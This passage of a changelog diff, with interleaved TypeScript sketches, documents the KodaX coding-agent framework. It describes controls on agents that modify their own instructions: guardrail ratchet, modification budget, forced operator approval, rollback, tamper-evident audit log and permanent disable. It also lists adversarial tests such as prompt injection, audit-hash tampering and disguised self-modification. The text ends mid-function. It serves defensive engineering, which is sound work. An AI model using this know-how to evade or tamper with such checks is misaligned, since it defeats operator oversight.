+ - **G2 LLM diff summary + force-ask-user** — activate path computes a structured `{ severity, summary, flaggedConcerns }` via the same `LlmReviewClient` interface FEATURE_089 uses (graceful fallback `severity='major'` record when no client is wired). Force-ask-user dialog **always** shows raw prev/next instructions verbatim — the LLM summary is advisory, not load-bearing. Even global `auto-approve` policy is overridden on the self-modify path.
+ - **G3 modification budget** — `DEFAULT_SELF_MODIFY_BUDGET=3` hardcoded in `budget.ts`; on-disk file value is ignored and `count` clamped to `>=0` against tampering. Exhausted budget hard-rejects with rule `budget-exhausted`; operator unlocks via `kodax constructed reset-self-modify-budget <name>` (writes a `self_modify_budget_reset` audit row with OS user attribution).
+ - **G4 rollback** — `kodax constructed rollback <name>` revokes the current active and re-registers the next-most-recent active version on disk. **Chained**: a second rollback restores the version before that, and so on, back to the original first-time activation. Re-runs admission against the rollback target so a target that no longer admits (system caps tightened, invariants changed) cannot be silently re-registered. Prior versions stay at `status='active'` (not `'archived'`) so the chain has rollback targets.
+ - **G5 audit log** — JSONL append-only at `.kodax/constructed/_audit.jsonl` with one entry per lifecycle event (`self_modify_{staged,tested,activated,rejected,rolled_back,disabled,budget_reset}`), each carrying timestamp, agent, version pair, diff hash, severity, OS user, policy verdict, budget remaining, and reject reason. `computeDiffHash(prev, next)` recomputation against on-disk manifests detects post-activate tampering (covered by adversarial test 5).
+
+ 6 hard-reject rules in `validateSelfModify` (pure function): `name-changed | kind-invalid | guardrail-ratchet | reasoning-ceiling | budget-exhausted | self-modify-disabled`. Guardrail ratchet is the load-bearing safety check — new `guardrails` set must be a superset of the prior set (adding allowed, removing not). `kodax constructed disable-self-modify <name>` is permanent (no `enable` command by design): writes a marker file `_self_modify_disabled.json` that `validateSelfModify` consults; **presence-wins** semantics — tampering `disabled: false` into the file does not re-enable; malformed JSON treated as fail-safe disabled.
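
The ratchet and presence-wins rules above can be illustrated with a small pure function. This is only a sketch: `validateSelfModifySketch`, `RoleSpecSketch`, and `SelfModifyContext` are hypothetical names, the order in which rules are checked is an assumption, `kind-invalid` is assumed to mean "the new kind is not `agent`", and `reasoning-ceiling` is omitted because its exact semantics are not described here.

```typescript
type RejectRule =
  | "name-changed"
  | "kind-invalid"
  | "guardrail-ratchet"
  | "budget-exhausted"
  | "self-modify-disabled";

interface RoleSpecSketch {
  name: string;
  kind: string;
  guardrails: readonly string[];
}

interface SelfModifyContext {
  budgetRemaining: number;
  // Raw contents of the disable marker file, or null when the file is absent.
  disableMarker: string | null;
}

// Presence wins: the file's contents (even `disabled: false` or malformed JSON) never re-enable.
function isSelfModifyDisabled(marker: string | null): boolean {
  return marker !== null;
}

// Ratchet: every prior guardrail must still be present; additions are allowed.
function isGuardrailSuperset(prev: readonly string[], next: readonly string[]): boolean {
  const nextSet = new Set(next);
  return prev.every((g) => nextSet.has(g));
}

// Returns the first violated rule, or null when the proposal passes these checks.
function validateSelfModifySketch(
  prev: RoleSpecSketch,
  next: RoleSpecSketch,
  ctx: SelfModifyContext,
): RejectRule | null {
  if (isSelfModifyDisabled(ctx.disableMarker)) return "self-modify-disabled";
  if (ctx.budgetRemaining <= 0) return "budget-exhausted";
  if (next.name !== prev.name) return "name-changed";
  if (next.kind !== "agent") return "kind-invalid";
  if (!isGuardrailSuperset(prev.guardrails, next.guardrails)) return "guardrail-ratchet";
  return null;
}
```

Keeping the function pure means the same inputs can be replayed later when auditing a decision.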
+
+ REPL bootstrap (`packages/repl/src/common/construction-bootstrap.ts`) wires `selfModifyAskUser` through the existing `activeAskUser` cell so the dialog renders LLM summary + severity + flagged concerns + raw prev/next instructions + budget snapshot. Without a bound askUser (ACP / single-shot CLI / child agents) self-modify activation hard-rejects — same defensive default as the regular construction policy.
+
+ **Tests**: 295 green across `validateSelfModify` (16) + `audit-log` + `budget` + `disable-state` + `rollback` + `self-modify-summary` (12) + `runtime-self-modify-activate` (8) + `agent-resolver-pending` (8) + `feature-090-adversarial.test.ts` (7 scenarios: prompt injection in instructions, ratchet violation, capability-tier escalation, recursive within-run self-modify, post-activate audit hash tampering, in-disguise via `stage_agent_construction`, tampered disable marker) + `self-modify-tool` + `self_modify_cli.test.ts` (14, CLIs end-to-end) + `construction-bootstrap.test.ts` (4, REPL wiring contract: bootstrap → activate → drain → next-run resolves new version).
+
+ **Surface**: top-level exports from `@kodax/coding` for `appendAuditEntry` / `readAuditEntries` / `readBudget` / `resetBudget` / `disableSelfModify` / `readDisableState` / `rollbackSelfModify` / `drainPendingSwaps` / `hasPendingSwap` / `resolveConstructedAgent` / `DEFAULT_SELF_MODIFY_BUDGET` + types `AgentArtifact` / `AuditEntry` / `BudgetState` / `DisableState` / `RollbackResult` / `SelfModifyAskUser` / `SelfModifyAskUserInput` / `SelfModifyDiffSummary` / `SelfModifyDiffSeverity`.
+
+ - **FEATURE_107 — AMA H2 Plan-Execute Boundary Eval** (architecture validation, not part of Plan B): Pre-registered eval answering whether the v0.7.16 design intent "Planner → fresh Generator session + plan artifact" was producing measurable Generator-quality benefits. **P1.0 candidate scan** (`benchmark/scan-h2-candidates.ts` against `~/.kodax/sessions/`): 533 sessions, 0 real H2 verdicts (confirms the FEATURE_107 telemetry pivot rationale), 45 candidates above heuristic threshold, only 28 with viable git SHAs for replay, only 5 with actual file mutation. **P1.5 dataset** (`benchmark/datasets/h2-plan-execute-boundary/`): 18 cases — 1 real-replay + 17 hand-curated across 5 categories (multi-file feature impl, cross-package refactor, multi-file bugfix, TDD multi-file). After Pool 3 archaeology and three rounds of self-audit (P1.5 / P1.5b / codex review with 3 HIGH + 3 MED + 2 LOW findings folded in), the dataset settled with explicit `mustTouchFiles` / `mustNotTouchFiles` golden signals + natural-language `acceptanceCriteria` for the LLM judge. **P2 harness** (~990 LOC under `benchmark/harness/`): `worktree-runner.ts` (git-worktree isolation envelope; 6/6 tests), `agent-task-runner.ts` (KodaX spawn with isolated HOME + variant-forcing env + binOverride), `h2-boundary-runner.ts` (cases × aliases × variants orchestrator with persisted `matrix.json`), `plan-intent-fidelity.ts` (LLM-as-judge for Generator deliverable vs Planner intent; 11/11 parser tests). **P2.1 source-side eval hooks** (~105 LOC, all tagged `// FEATURE_107 P2.1: DELETE WITH B-PATH IMPL AT P6`): `applyForcedHarness()` (`KODAX_FORCE_MAX_HARNESS` rewrites `plan.harnessProfile`), `stripPlannerReasoningForGenerator` `inputFilter` on `plannerHandoffs` (`KODAX_PLANNER_INPUTFILTER=strip-reasoning`). **Empirical conclusion**: H2-A (full Planner transcript) and H2-B (only `emit_contract` artifact) produce identical Generator outcomes across 6 aliases × 3 cases (0pp delta). 
Variant B `inputFilter` wiring + supporting code **deleted**; v0.7.16's "new session + plan artifact" design intent formally retired (full-transcript stays). The long-context suite (18 cells, 5 aliases) revealed that **context-window length** (not raw model capability) is the dominant factor in long-context quality: short-window models (200-256K) hit attention degradation around 120K. Two production changes shipped from these findings, plus one observability addition: (a) **per-context-window adaptive `triggerPercent`** in `compaction-config.ts` (≤200K → 60%, ≤256K → 65%, ≤500K → 70%, >500K → 75%); user-explicit `triggerPercent` still wins. (b) **Generator reasoning-discipline** (Claude Code verbatim, bidirectional, "high bar" for a blocked `emit_handoff`) hardcoded into `role-prompt.ts`; the boundary suite confirmed it harmless across 6 aliases. (c) The compaction trigger now emits one stderr line per event (default-on, zero-cost observability).
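
The adaptive `triggerPercent` tiers described for FEATURE_107 amount to a small lookup. The sketch below uses hypothetical function names and assumes "K" means 1,000 tokens; the actual `compaction-config.ts` may express this differently.

```typescript
// Hypothetical helper; thresholds are taken from the tiers listed above.
function adaptiveTriggerPercent(contextWindowTokens: number, userExplicit?: number): number {
  if (userExplicit !== undefined) return userExplicit; // a user-explicit value still wins
  if (contextWindowTokens <= 200_000) return 60;
  if (contextWindowTokens <= 256_000) return 65;
  if (contextWindowTokens <= 500_000) return 70;
  return 75;
}

// Token count at which compaction would start for a given window.
function compactionThresholdTokens(contextWindowTokens: number, userExplicit?: number): number {
  const percent = adaptiveTriggerPercent(contextWindowTokens, userExplicit);
  return Math.floor((contextWindowTokens * percent) / 100);
}
```

For a 200K window this gives 200,000 × 60% = 120,000 tokens, which lines up with the roughly 120K point where short-window models were observed to degrade; the legacy 75% default would have waited until 150,000.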
+
+ ### Fixed
+
+ - **`bench` worktree drift detection** — `worktree-runner.ts` orphan scan now catches modifications to **tracked** files, not just untracked additions. Cleans up dead env wiring left over from the P2 design pass that the agent-task-runner never read.
+
+ ### Documentation
+
+ - **EVAL_GUIDELINES rewrite** — `benchmark/EVAL_GUIDELINES.md` now documents the **single-turn probe methodology** as the official KodaX eval pattern and removes end-to-end loop comparisons from the recommended set. Loops conflate prompt quality with tool-availability artefacts (model tries to verify with `read`/`grep`/`bash`, harness can't provide tools, benchmark scores the format-fail). Single-turn probes test the prompt-only contract.
+ - **FEATURE_108 design** (`docs/features/v0.7.47.md`) — Session-Driven Reflective Prompt Patcher spec landed for v0.7.47 design preview.
+ - **FEATURE_109 design** (`docs/features/v0.7.48.md`) — Harness Observability Substrate (long-term memory + prediction contract + cross-family prose guard) spec landed for v0.7.48 design preview.
+ - **`docs/features/v0.7.29.md` 1496-line expansion** — folds back the historical capability-inventory artifact (`v0.7.29-capability-inventory.md` deleted) and adds deeper FEATURE_103/104/107-related context to the v0.7.29 retrospective.
+ - **`docs/CODING_AGENT_PROMPTS.md`** — cross-project prompt-system reference (4 open-source coding agents) for KodaX prompt design comparison. Research artefact, not a project doc.
+ - **`docs/features/v0.7.32.md`** — FEATURE_090 design section drift-corrected against implementation: disable mechanism described as marker file (not allowed-tools removal); prior versions kept at `status='active'` for chained rollback (not `archived`); divergence detection rejected in favour of LLM diff summary; no instructions-keyword static check (intentional simplification — relies on operator + advisory `flaggedConcerns`). Operator-facing usage section integrated directly into the design doc (the standalone `FEATURE_090_USER_GUIDE.md` was deleted to comply with the docs structure rule).
+ - **`docs/FEATURE_LIST.md`**: `FEATURE_090` and `FEATURE_107` moved from "Planned" to "已完成 Feature" (Completed Features) with a `v0.7.32 (unreleased)` annotation; the "Current released version" pointer advanced to `v0.7.32`; the v0.7.32 row of `各版本待做分布` (per-version to-do distribution) dropped (no Planned features remain at this version). Tracker-consistency test green.
+
+ ### Tests
+
+ - 295 new tests across FEATURE_090 surface (construction unit + 4 CLI integration + 7 adversarial scenarios + 4 REPL bootstrap integration). Build green; FEATURE_090 + FEATURE_107 paths exercised end-to-end without regressions to FEATURE_087/088/089/100/101/106 surfaces. `tests/tracker-consistency.test.ts` 4/4 green after FEATURE_LIST.md sync.
+
+ ### Migration
+
+ - No user-facing migration. FEATURE_090's `stage_self_modify` tool is gated to `kind='agent'` constructed artifacts (builtin Scout / Planner / Generator / Evaluator can never self-modify by design — their declarations live in `@kodax/core` and are immutable). `selfModifyAskUser` defaults to `'reject'` on non-interactive surfaces (ACP / single-shot CLI / child agents), preserving the v0.7.28 invariant that self-construction requires explicit operator consent. FEATURE_107's `inputFilter` hooks are deleted with the B-path conclusion — no leftover plumbing. Adaptive compaction `triggerPercent` defaults change automatically on next REPL session start; user-explicit values in config still win. The `.kodax/constructed/_audit.jsonl` and `.kodax/constructed/agents/<name>/_self_modify*.json` files are created lazily on first self-modify event — no migration of existing constructed agents required.
+
+ ---
+
+ ## [0.7.31] - 2026-04-29
+
+ ### Theme
+
+ Three coupled features close out v0.7.31: **FEATURE_101** turns Layer A's structural "agent + handoffs + guardrails" types into an admission contract — `Runner.admit(manifest)` runs an 8-invariant 5-step audit before a manifest can boot; **FEATURE_089** lifts FEATURE_088 self-construction from tools to agents (5-step staircase: scaffold → validate → stage → test → activate), with sandbox runner + within-session re-admission gate at activate-time; **FEATURE_106** replaces v0.7.30's silent scope-reflection with a `ToolGuardrail`, rewrites the Scout role-prompt's quality framework (hard rule: "≥2 files OR start a project from scratch → must `emit_scout_verdict` BEFORE the first write"), and registers `harnessSelectionTiming` as the 8th admission invariant. Stage 1 benchmark across 8 coding-plan provider/model alias × 6 task × 2 prompt variant (96 cells, 11m29s wall-clock) drops the multi-file-H0 leakage rate from **15.6% → 0.0%** (acceptance gate ≤5%) with H1-class pass rate jumping +50 percentage points (37.5% → 87.5%) and `pre_emit_commitment_rate` 65.6% → 84.4% (≥70% gate). Stage 2 reasoning sweep (108 cells, 6 task × 3 alias × 2 prompt × 3 reasoning, 7m57s) shows reasoning depth has zero effect on multi_file_h0_rate (current: 8.3% across quick/balanced/deep; feature_106: 0.0% across all three) — reverses the v0.7.30 "reasoning ⇒ over-confident H0" hypothesis and grants FEATURE_103 reasoning `default=balanced` keep status on quantitative grounds, not assumption. Stage 3 production-fidelity eval (3 cells: real LLM × `createRolePrompt('scout', ...)` × `Runner.run` × mock mutation tools) closes the remaining gap: 3/3 alias (`zhipu/glm51` / `ds/v4pro` / `kimi`) all walk the **committed-early** path — Scout reads / greps to gather context, then calls `emit_scout_verdict({confirmed_harness:H1_EXECUTE_EVAL})` without writing any files. 
Guardrail does not need to fire because the production Scout prompt's "Do NOT do the implementation yourself for H1/H2 tasks" rule is honored upstream; zero `composition-fail` cells.
+
+ ### Added
+
+ - **FEATURE_101: Constructed Agent Admission Contract (`Runner.admit`)**: New admission layer in `@kodax/core` turns structural agent manifests into runnable agents only after a 5-step audit passes. **Layer A surface**: `AgentManifest` + `InvariantId` + `ManifestPatch` (monotone: `tools` only narrows, `handoffs` only narrows, `maxBudget` only decreases) + `composePatches` (min-wins for budget, intersection for tools/handoffs) + `applyManifestPatch` (idempotent, monotonicity-checked) + `InvariantResult` discriminated union (`ok`/`reject`/`clamp(with patch)`/`warn`) + `QualityInvariant` 3-hook model (`admit`/`observe`/`assertTerminal`) + `AdmissionVerdict` (`ok+manifest+patches+warnings` | `reject+reason+retryable`). **5-step audit pipeline**: (1) schema-validate the manifest; (2) run each registered invariant's `admit` hook in declared order; (3) compose all returned patches, fail if any reject; (4) apply the composed patch monotonically to the manifest; (5) re-audit the composed manifest to catch second-order rejects. **8 v1 invariants registered**: `finalOwner` (handoff graph terminates at a single owner), `handoffLegality` (no cycles, no orphan kinds), `evidenceTrail` (mutating tools imply at least one observer in the chain), `harnessSelectionTiming` (FEATURE_106's 8th invariant: for H1/H2 work, `emit_scout_verdict` must precede the first mutation), `budgetCeiling` (declared `maxBudget` ≤ system cap), `toolPermission` (declared tools fall within capability tier whitelist; `bash:network` requires explicit override), `boundedRevise` (revisions are a finite chain, no unbounded retry loops), `independentReview` (if a `qa-reviewer` role appears, it must be a different name from the generator). **Capability classification**: `resolveToolCapability(name)` maps tool names to one of `read` / `edit` / `bash:test` / `bash:read-only` / `bash:mutating` / `bash:network` / `subagent` tiers. Repo-intel tools (`repo_overview` / `changed_scope` / etc.)
classified as `read`; worktree / construction tools as `subagent`. **Layered architecture**: pure invariants in `packages/core/src/invariants/` (no `@kodax/coding` dep); capability-coupled invariants (`budget-ceiling` / `tool-permission` / `bounded-revise` / `independent-review`) in `packages/coding/src/agent-runtime/invariants/`. `registerCodingInvariants()` calls `registerCoreInvariants()` then layers the 4 capability-coupled ones. **Tests**: 51 new tests across 8 invariant test files + admission-runtime + admission-audit; all tests green. **HIGH fix during review-gate**: `invariantBindings` previously included unregistered ids, masking missing registrations as silent no-ops; filtered to ids where `getInvariant(id)` resolves so unknown declared ids surface as a clear retryable error.
+
+ - **FEATURE_089 — Self-Construction Tier 3: Agent Generation**: Mirrors FEATURE_088's tool construction staircase but produces `Agent` manifests instead of `KodaXToolDefinition`. Five new internal tools form the agent generation pipeline: `scaffold_agent` (emits a fillable `AgentArtifact` skeleton), `validate_agent` (dry-run admission audit on candidate JSON; no disk write), `stage_agent_construction` (persists under `.kodax/constructed/agents/<name>/<version>.json`), `test_agent` (manifest shape check + `Runner.admit` + sandbox-runner case execution against an injected LLM callback), `activate_agent` (invokes the construction policy gate, flips `status=active`, records contentHash, and registers the agent in the resolver so `Runner.run` can find it by name). **Discriminated union extension**: `ConstructionArtifact` widened from `tool` only to `tool | agent` (kind dispatch in helpers, no type-guards everywhere); `ToolArtifact` and `AgentArtifact` differ only in `kind` and `content` shape (`AgentContent` carries `instructions` + `tools[]` + `handoffs[]` + `reasoning` + `guardrails[]` + `model` + `provider` + `outputSchema` + `testCases[]` + `maxBudget` + `declaredInvariants[]`). **Admission bridge** (`admission-bridge.ts`): pure `buildAdmissionManifest({name, content})` lifts `AgentContent` (refs as strings) → `AgentManifest` (refs as structural `Agent` stubs) for `Runner.admit` consumption. **Resolver** (`agent-resolver.ts`): module-singleton `AGENT_REGISTRY` parallel to `TOOL_REGISTRY`; `registerConstructedAgent(artifact)` returns an unregister callback the `ConstructionRuntime` stores in its `_activated` map; tool refs lifted through `TOOL_REGISTRY` snapshot at activation time. **Sandbox runner** (`sandbox-runner.ts`): drives `testCases` through `Runner.run` with `Promise.race` wall-clock budget (default 30s; AbortSignal alone is advisory because Runner.run's LLM callback may not honor it). 
Each case graded against `expectMatch`/`expectNotMatch`/`expectFinalText`. **Within-session tampering closed**: `activate()` re-runs `Runner.admit` for kind=`agent` so a write tool overwriting the manifest between `test_agent` and `activate_agent` cannot bypass admission. **Tests**: 87 new tests across runtime-agent / agent-resolver / agent-runner-integration / sandbox-runner / admission-bridge / agent-construction; 185 total construction tests green.
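
The monotone patch rules listed for FEATURE_101 (intersection for `tools` and `handoffs`, min-wins for `maxBudget`, idempotent and monotonicity-checked application) can be sketched as below. The `*Sketch` names and the reduced manifest shape are hypothetical; the real `ManifestPatch`, `composePatches`, and `applyManifestPatch` carry more fields and may report violations differently than by throwing.

```typescript
// Reduced, hypothetical shapes covering only the three monotone fields.
interface ManifestSketch {
  tools: readonly string[];
  handoffs: readonly string[];
  maxBudget: number;
}

interface PatchSketch {
  tools?: readonly string[];
  handoffs?: readonly string[];
  maxBudget?: number;
}

function intersect(a: readonly string[], b: readonly string[]): string[] {
  const inB = new Set(b);
  return a.filter((item) => inB.has(item));
}

// Compose: intersection for tools/handoffs, minimum for the budget.
function composePatchesSketch(patches: readonly PatchSketch[]): PatchSketch {
  const out: PatchSketch = {};
  for (const p of patches) {
    if (p.tools !== undefined) {
      out.tools = out.tools === undefined ? p.tools : intersect(out.tools, p.tools);
    }
    if (p.handoffs !== undefined) {
      out.handoffs = out.handoffs === undefined ? p.handoffs : intersect(out.handoffs, p.handoffs);
    }
    if (p.maxBudget !== undefined) {
      out.maxBudget = out.maxBudget === undefined ? p.maxBudget : Math.min(out.maxBudget, p.maxBudget);
    }
  }
  return out;
}

// Apply: reject any patch that would widen a list or raise the budget.
function applyPatchSketch(manifest: ManifestSketch, patch: PatchSketch): ManifestSketch {
  const widens = (base: readonly string[], next?: readonly string[]): boolean =>
    next !== undefined && next.some((item) => !base.includes(item));
  if (widens(manifest.tools, patch.tools) || widens(manifest.handoffs, patch.handoffs)) {
    throw new Error("patch would widen tools or handoffs");
  }
  if (patch.maxBudget !== undefined && patch.maxBudget > manifest.maxBudget) {
    throw new Error("patch would raise maxBudget");
  }
  return {
    tools: patch.tools ?? manifest.tools,
    handoffs: patch.handoffs ?? manifest.handoffs,
    maxBudget: patch.maxBudget ?? manifest.maxBudget,
  };
}
```

Applying the same patch twice yields the same manifest, because after the first application the patch's lists are already equal to the manifest's.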
+
+ ### Changed
+
+ - **FEATURE_106 — AMA Harness Selection Calibration**: Replaces v0.7.30's silent `scope-reflection` middleware (which split off a separate ToolGuardrail-like surface only on the FEATURE_084 path) with a unified `ToolGuardrail.afterTool` hook (`scope-aware-harness-guardrail.ts`), idempotent on `tracker.reflectionInjected`. **Scout role-prompt rewrite** (`packages/coding/src/task-engine/_internal/managed-task/role-prompt.ts`): the §QUALITY FRAMEWORK section is rewritten — H0 reframed from "default" to "Bounded mutation OR pure answer (≤1 file ≤30 lines mutation OR no file mutation at all)"; H0/H1/H2 examples now quantified (H1: ≥2 files OR >30 lines; H2: project from scratch / cross-module refactor); the subjective "SCOPE SELF-CHECK" replaced with a **SCOPE COMMITMENT (hard rule)**: "If you intend to write ≥2 files OR start a project from scratch, call `emit_scout_verdict({confirmed_harness: H1 or H2})` BEFORE the first write. The scope guardrail will surface belated commitments and slow you down." Declarative `Guardrail` markers on `scoutSpec`/`generatorSpec` in `coding-agents.ts`. `runner-driven.ts` wires `createScopeAwareHarnessGuardrail` into the AMA path. **`harnessSelectionTiming` invariant** registered as FEATURE_101's 8th: detects when the manifest declares H1/H2 work but the runtime trace shows the first mutation preceding the `emit_scout_verdict` tool call. **Eval (Stage 1)**: 96 cells × 8 alias / 6 task / 2 prompt variant × 1 run, 11m29s wall-clock. Multi-file H0 leakage rate **15.6% → 0.0%**, H1 class pass rate **37.5% → 87.5%** (+50pp), `pre_emit_commitment_rate` **65.6% → 84.4%** (hard rule eliminates all 5 wrong-harness cases). Apparent H0/H2 -12.5pp regressions are all benchmark-format failures from models trying to actually use `read`/`grep`/`bash` to verify lookup answers (correct production behavior, not classification errors); the harness can't provide tools, so those outputs lack a parseable `HARNESS:` line. 
Per-cell verification confirms zero new mispicks under `feature_106`. **Eval (Stage 2 reasoning sweep)**: 108 cells (6 tasks × 3 aliases × 2 prompt variants × 3 reasoning levels (low/medium/high) × 1 run), 7m57s wall-clock. Reasoning depth has **zero effect on multi_file_h0_rate** (current: 8.3% / 8.3% / 8.3%; feature_106: 0.0% / 0.0% / 0.0%), which reverses v0.7.30's "deeper reasoning ⇒ over-confident H0" hypothesis. Per the Eval Plan decision matrix ("differences across the three tiers are within noise → keep FEATURE_103"), keep `default=balanced` / `max=deep` / `escalateOnRevise=false`. The harness extension to support per-call reasoning was 5 small edits in `benchmark/harness/harness.ts` (`provider.stream`'s 4th arg has accepted `KodaXReasoningRequest` since v0.7.0; the harness just wasn't passing it).
+
+ - **`ConstructionRuntime` discriminated extension**: `runtime.ts::test()` and `registerActiveArtifact()` now dispatch on `artifact.kind`. `SUPPORTED_KINDS = ['tool', 'agent']`. Tool path is byte-identical to v0.7.30; agent path adds `testAgentArtifact` (admission bridge + sandbox) and `registerActiveAgentArtifact` (resolver wiring + revoke unregister). FEATURE_088 builders (`buildToolArtifact`) narrowed to `Partial<ToolArtifact> → ToolArtifact` so the discriminant is preserved through factory paths. No regressions: existing 49 runtime tests + 4 e2e tests continue to pass alongside the 87 new agent-side tests.
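
The quantified H0/H1/H2 boundaries and the timing rule from the FEATURE_106 entry can be sketched as two small checks. Everything here is hypothetical (`minimumHarness`, `mutatedBeforeVerdict`, and the input shapes); the shipped prompt and the `harnessSelectionTiming` invariant work on richer data, and the timing check is assumed to be applied only when H1/H2 work is declared.

```typescript
type Harness = "H0" | "H1" | "H2";

interface PlannedScope {
  files: number; // files the agent intends to write
  lines: number; // total lines it intends to change
  fromScratch: boolean;
  crossModuleRefactor: boolean;
}

// H2: project from scratch or cross-module refactor; H1: >=2 files or >30 lines; otherwise H0.
function minimumHarness(scope: PlannedScope): Harness {
  if (scope.fromScratch || scope.crossModuleRefactor) return "H2";
  if (scope.files >= 2 || scope.lines > 30) return "H1";
  return "H0";
}

interface ToolEvent {
  tool: string;
  mutating: boolean;
}

// True when the first mutating call precedes the first emit_scout_verdict call,
// or when a mutation happens and no verdict was emitted at all.
function mutatedBeforeVerdict(trace: readonly ToolEvent[]): boolean {
  const firstMutation = trace.findIndex((e) => e.mutating);
  if (firstMutation === -1) return false;
  const verdict = trace.findIndex((e) => e.tool === "emit_scout_verdict");
  return verdict === -1 || firstMutation < verdict;
}
```

A trace of read, grep, `emit_scout_verdict`, then write matches the committed-early path; moving the write ahead of the verdict is what the timing check would flag.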
+
+ ### Tests
+
+ - 1,629 `@kodax/coding` tests pass (185 in `packages/coding/src/construction/` covering both tool and agent paths). `@kodax/core` admission test suite (51 tests) green. Full workspace build clean.
+
+ ### Migration
+
+ - No user-facing migration required. FEATURE_101's `Runner.admit()` is opt-in for callers building agents from a manifest; all existing `Runner.run()` paths in REPL / coding / mcp continue to work without change. FEATURE_089's 5 new construction tools sit behind the same construction-policy permission gate as FEATURE_088's tool-construction tools, so non-interactive surfaces continue to reject activation by default. FEATURE_106's prompt rewrite ships in the production Scout role-prompt; restarting an active KodaX REPL session is sufficient to pick it up.
+
+ ### Post-release implementation completion patches (folded into v0.7.31 tag)
+
+ The v0.7.31 tag points at HEAD = `5456d9a`, which includes two post-release audit patches and one review follow-up on top of the original `9ef5aad` release commit. All three close silent-footgun gaps surfaced after the initial commit; none change documented v0.7.31 behavior. Captured here so the tag-to-release-notes correspondence is unambiguous.
+
+ #### v0.7.31.1 — FEATURE_101 implementation completion patch (commit `4668732`)
+
+ 8 admission-runtime wiring gaps closed:
+
+ - `admission-session.ts` — `setAdmittedAgentBindings` / `getAdmittedAgentBindings` WeakMap binding registry promoted from per-test scaffolding to first-class production primitive that carries `{bindings, manifest}` for the dispatch site to consult.
+ - `admission-metrics.ts` — `_incAdmitOk(clamped)` / `_incAdmitReject(retryable)` rate counters wired so `admission_clamp_rate` / `admission_reject_after_retry_rate` / `invariant_violation_rate` can be queried at runtime instead of computed from logs.
+ - `runner.ts` admit-time double-wrap fix — `buildSystemPrompt` no longer wraps a manifest's instructions twice when the manifest was already admitted (TRUSTED_HEADER + role spec + TRUSTED_FOOTER fence). Q6 baseline (5 tasks × 8 alias) re-verified post-fix at 40/40 cells 100/100.
+ - Runtime-clamp invariant hooks — `runner.ts`'s tool-result callback synchronously calls `invariantSession.recordMutation` so `evidenceTrail.observe` sees individual file events; `mutationTracker.files.size` exposed for threshold-class assertions.
+ - Same-batch handoff cycle detection: `handoffLegality.admit` now consults `ctx.stagedAgents` (in addition to `activatedAgents`), so two manifests staged together with `A→B` and `B→A` can no longer each pass admission individually.
+ - Debug flag — `KODAX_ADMISSION_DEBUG=1` env triggers verbose admission audit logs for offline trace replay.
+ - Built-in handoff resolution — `Runner.admit` resolves built-in agent names (`generator`, `evaluator`, `planner`, `scout`) to the canonical specs in `coding-agents.ts` so a manifest declaring a handoff to one of them by name no longer rejects with "unknown target".
+ - Q3 retry-cap rollback — the v0.7.31.1 first-cut implementation added per-name `KODAX_ADMISSION_RETRY_CAP` env defense; threat-model audit confirmed it solved a non-existent threat (KodaX is single-user CLI, no retry-attack surface) and was over-engineered. Reverted before commit.
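The same-batch cycle check in the list above can be pictured with a small graph walk. This is a sketch under stated assumptions: manifests are reduced to a hypothetical `ManifestLike` (a name plus handoff targets), and the lookup order (activated first, then staged) is assumed rather than copied from `handoffLegality.admit`.

```typescript
// Hypothetical reduced manifest: just a name and the names it hands off to.
interface ManifestLike {
  name: string;
  handoffs: readonly string[];
}

// Returns true if following handoffs from `candidate` can lead back to it.
// Targets are looked up in activated agents first, then in same-batch staged ones.
function hasHandoffCycle(
  candidate: ManifestLike,
  activated: ReadonlyMap<string, ManifestLike>,
  staged: ReadonlyMap<string, ManifestLike>,
): boolean {
  const resolve = (name: string) => activated.get(name) ?? staged.get(name);
  const seen = new Set<string>();
  const stack = [...candidate.handoffs];
  while (stack.length > 0) {
    const name = stack.pop() as string;
    if (name === candidate.name) return true;
    if (seen.has(name)) continue;
    seen.add(name);
    const target = resolve(name);
    if (target) stack.push(...target.handoffs);
  }
  return false;
}
```

If the staged map is ignored, a manifest `A` that hands off to a staged `B` (which hands back to `A`) looks acyclic, which is the gap the patch describes.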
+
+ #### v0.7.31.2 — FEATURE_101/106 second implementation completion patch (commit `ff22562`)
+
+ 5 silent-footgun gaps closed:
+
+ - **SA mutation-reflection text rewrite (CAP-016)** — `packages/coding/src/agent-runtime/middleware/mutation-reflection.ts` removed the dead AMA-escalation hint that referenced `emit_managed_protocol`. Per ADR-003, SA mode is direct execution with no mid-run harness escalation; the legacy text was inherited from a pre-FEATURE_106 era and induced hallucinated tool calls in real models. New text is SA-self-review oriented (re-read diff / run typecheck/tests / suggest user re-run under AMA mode). Real-LLM benchmark across 8 coding-plan providers × 3 task scenarios shows **100% safety judges pass, zero hallucinated AMA tool calls**.
+ - **`toolPermission` classifier expansion** — 9 NEW tool names added to the `subagent` tier classification: 4 canonical AMA emit (`emit_scout_verdict` / `emit_contract` / `emit_handoff` / `emit_verdict`) + 5 FEATURE_089 staircase (`scaffold_agent` / `validate_agent` / `stage_agent_construction` / `test_agent` / `activate_agent`). Internal admission audit, not LLM-facing — no benchmark needed. +2 unit tests.
+ - **`independentReview` stagedAgents fallback** — `reachableNames` now consults `ctx.stagedAgents` so a same-batch staging where the planner's handoff captured a stub generator before the staged generator's full topology was scaffolded still admits correctly. Mirrors `handoffLegality`'s authoritative-resolution pattern (activated > staged > inline target). +1 unit test.
+ - **`registerActiveArtifact` exhaustiveness guard** — `const _exhaustive: never = artifact` assertion + throw added so a future tier-3 artifact kind cannot silently fall through. Defensive only.
+ - **`clampMaxIterations` real implementation** — added `AgentManifest.maxIterations` field (symmetric with `maxBudget`), `applyManifestPatch` apply branch (monotone, only narrows), and `Runner.run` min-wins wiring through the WeakMap binding registry: `getAdmittedAgentBindings(startAgent)?.manifest.maxIterations` against `RunOptions.maxToolLoopIterations`. **Scope: per-run, not per-agent** — the cap is read from the entry agent's manifest once before the tool loop; v1 admission audits at run entry only, no per-handoff reclamping. Successor agents share the entry cap as the run total. +2 unit tests + 5 integration tests in new `runner-iteration-clamp.test.ts`.
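The min-wins wiring described in the last item can be sketched as below. The `AgentLike` and `ManifestLike` shapes, the `admitted` registry, and `effectiveIterationCap` are hypothetical stand-ins; the notes only state that the entry agent's `manifest.maxIterations` is compared against `RunOptions.maxToolLoopIterations` once per run.

```typescript
// Hypothetical minimal shapes; the real AgentManifest and RunOptions carry more fields.
interface AgentLike {
  name: string;
}
interface ManifestLike {
  maxIterations?: number;
}

// WeakMap registry keyed by the agent object, mirroring the binding-registry idea.
const admitted = new WeakMap<AgentLike, { manifest: ManifestLike }>();

// Min-wins: the effective cap is the smaller of the run option and the entry
// agent's manifest cap; a missing value on either side does not constrain.
function effectiveIterationCap(
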